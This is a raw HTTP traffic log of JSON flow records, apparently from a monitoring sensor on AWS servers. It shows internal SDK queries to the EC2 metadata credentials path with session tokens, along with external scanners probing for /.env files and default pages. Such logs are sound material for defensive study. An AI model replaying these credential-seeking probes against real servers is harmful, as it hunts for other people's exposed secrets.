{"endtime":"2022-04-06T12:11:42.455605Z","timestamp":"2022-04-06T12:11:42.455412Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 12:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"6c6eddd8-36c5-4162-b3b3-1496903b2566","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rloMtAuWJAl8x8Rj_euHzV1DshFLTPF3NylS3DiUUO0SLg==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":44320,"status":404,"time_taken":203,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T12:11:42.454877Z","timestamp":"2022-04-06T12:11:42.454441Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 11:19:30 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 12:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"c87fdd8e-8290-494d-ac45-99807cfff922","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rlpISY2KKWq4mdAIyZ2OUwoXcHsMFj0Jl1Jpcr8sQ60VEw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":44318,"status":200,"time_taken":458,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T12:02:06.088073Z","timestamp":"2022-04-06T12:02:06.086821Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 12:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"53b08cc7-b124-4923-b576-53387f627661","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":54514,"status":404,"time_taken":1265,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T12:02:06.086275Z","timestamp":"2022-04-06T12:02:06.085947Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 11:04:59 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 12:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"ea71549c-e561-463c-bd77-ba80b9fb443c","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":54512,"status":200,"time_taken":358,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T12:01:59.878823Z","timestamp":"2022-04-06T12:01:59.878572Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 12:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"4c2280bc-b524-43e7-954b-e5a783e3ede2","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":50022,"status":404,"time_taken":275,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T12:01:59.877796Z","timestamp":"2022-04-06T12:01:59.875689Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 11:40:41 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 12:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"56d666a1-66a3-437b-b1e8-f785153cb61f","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":50020,"status":200,"time_taken":2157,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T11:55:22.861770Z","timestamp":"2022-04-06T11:55:22.860503Z","bytes":1418,"bytes_in":173,"bytes_out":1245,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /script

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1089\r\nDate: Wed, 06 Apr 2022 11:55:22 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":[4,1089],"flow_id":"4f0dd211-7fe5-4721-afce-e9eff630cec3","http_comment":"HTTP/1.1 404 ","http_content_length":1089,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /script HTTP/1.1","src_content":"\n\n\n\n","src_headers":"GET /script HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"164.92.158.199","src_mac":"02:A5:92:DA:49:85","src_port":35780,"status":404,"time_taken":152807,"transport":"tcp","uri":"/script","uri_path":"/script"} {"endtime":"2022-04-06T11:54:34.462572Z","timestamp":"2022-04-06T11:54:34.461373Z","bytes":1414,"bytes_in":169,"bytes_out":1245,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /script

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1089\r\nDate: Wed, 06 Apr 2022 11:54:34 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1089,"flow_id":"011262ba-08d8-4888-a0f8-a5d8c2c79f6c","http_comment":"HTTP/1.1 404 ","http_content_length":1089,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /script HTTP/1.1","src_headers":"GET /script HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"209.141.40.224","src_mac":"02:A5:92:DA:49:85","src_port":52896,"status":404,"time_taken":38905,"transport":"tcp","uri":"/script","uri_path":"/script"} {"endtime":"2022-04-06T11:52:03.951453Z","timestamp":"2022-04-06T11:52:03.950232Z","bytes":2303,"bytes_in":209,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 11:52:03 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"d736b906-02c6-4b35-a8f1-7e9cb96433d9","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 ","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 \r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"185.180.143.137","src_mac":"02:A5:92:DA:49:85","src_port":48398,"status":200,"time_taken":164166,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T11:41:50.339852Z","timestamp":"2022-04-06T11:41:50.339852Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"513a55c4-2bce-4a4c-9906-ad6edf5313e1","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"20.57.130.174","src_mac":"02:A5:92:DA:49:85","src_port":52320,"time_taken":13080,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T11:40:17.041954Z","timestamp":"2022-04-06T11:40:17.041855Z","bytes":327,"bytes_in":18,"bytes_out":309,"dest_content":"\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx/1.21.5
\r\n\r\n\r\n","dest_headers":"HTTP/1.1 400 Bad Request\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 11:40:17 GMT\r\nContent-Type: text/html\r\nContent-Length: 157\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":157,"flow_id":"f74e2d27-a7ea-4b59-a0b8-850f0a0e0363","http_comment":"HTTP/1.1 400 Bad Request","http_content_length":157,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"nginx/1.21.5","src_headers":"GET / HTTP/1.1\r\n\r\n","src_ip":"185.189.182.234","src_mac":"02:A5:92:DA:49:85","src_port":36764,"status":400,"time_taken":147159,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T11:27:15.291959Z","timestamp":"2022-04-06T11:27:15.291959Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"354e25b6-5348-4045-b17c-470b31c51839","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":41380,"time_taken":168025,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T11:11:42.454929Z","timestamp":"2022-04-06T11:11:42.454739Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 11:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"b930598f-9507-4e0a-ae65-4e5605a25860","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rloMtAuWJAl8x8Rj_euHzV1DshFLTPF3NylS3DiUUO0SLg==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":42910,"status":404,"time_taken":199,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T11:11:42.454325Z","timestamp":"2022-04-06T11:11:42.453878Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 10:19:09 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 11:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"efa3f8b2-623a-42ee-8ac1-ab11fa7f69a0","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rlpISY2KKWq4mdAIyZ2OUwoXcHsMFj0Jl1Jpcr8sQ60VEw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":42908,"status":200,"time_taken":467,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T11:02:06.086529Z","timestamp":"2022-04-06T11:02:06.086292Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 11:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"0bc473f8-1baa-4412-b72a-3f660c9181bf","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":56790,"status":404,"time_taken":248,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T11:02:06.085848Z","timestamp":"2022-04-06T11:02:06.085576Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 10:03:30 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 11:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"723e9fab-0b0d-49eb-b76d-1f5fd496fc92","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":56788,"status":200,"time_taken":317,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T11:01:59.876482Z","timestamp":"2022-04-06T11:01:59.876291Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 11:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"bcf67ab9-174e-4a27-b3ba-f57413b9dfd8","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":48616,"status":404,"time_taken":215,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T11:01:59.875620Z","timestamp":"2022-04-06T11:01:59.875361Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 14400\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 10:36:31 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 11:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"820fd17c-6679-45e6-92b5-93a2a4b84ad9","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":48614,"status":200,"time_taken":319,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T10:54:00.866347Z","timestamp":"2022-04-06T10:54:00.864933Z","bytes":1661,"bytes_in":101,"bytes_out":1560,"dest_content":"\n Login | Access\n\t\n\t\n\t\n\t\n\n\n\t
\n\t\t
\n\t\t\t
\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t\n\t\t\t\t
\n\t\t\t
\n\t\t
\n\t
\n\t\n\t\n\n","dest_headers":"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 1408\r\nDate: Wed, 06 Apr 2022 10:54:00 GMT\r\nServer: Python/3.6 aiohttp/3.6.2\r\n\r\n","dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":8888,"file_size":1408,"flow_id":"57b4bf60-9f7a-4cb8-8be4-6a212f477a90","http_comment":"HTTP/1.1 200 OK","http_content_length":1408,"http_content_type":"text/html; charset=utf-8","http_method":"GET","http_user_agent":"https://gdnplus.com:Gather Analyze Provide.","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"Python/3.6 aiohttp/3.6.2","site":"54.189.97.219:8888","src_headers":"GET / HTTP/1.1\r\nHost: 54.189.97.219:8888\r\nUser-Agent: https://gdnplus.com:Gather Analyze Provide.\r\n\r\n","src_ip":"104.206.128.66","src_mac":"02:A5:92:DA:49:85","src_port":52153,"status":200,"time_taken":9889,"transport":"tcp","uri":"/","uri_path":"/"} 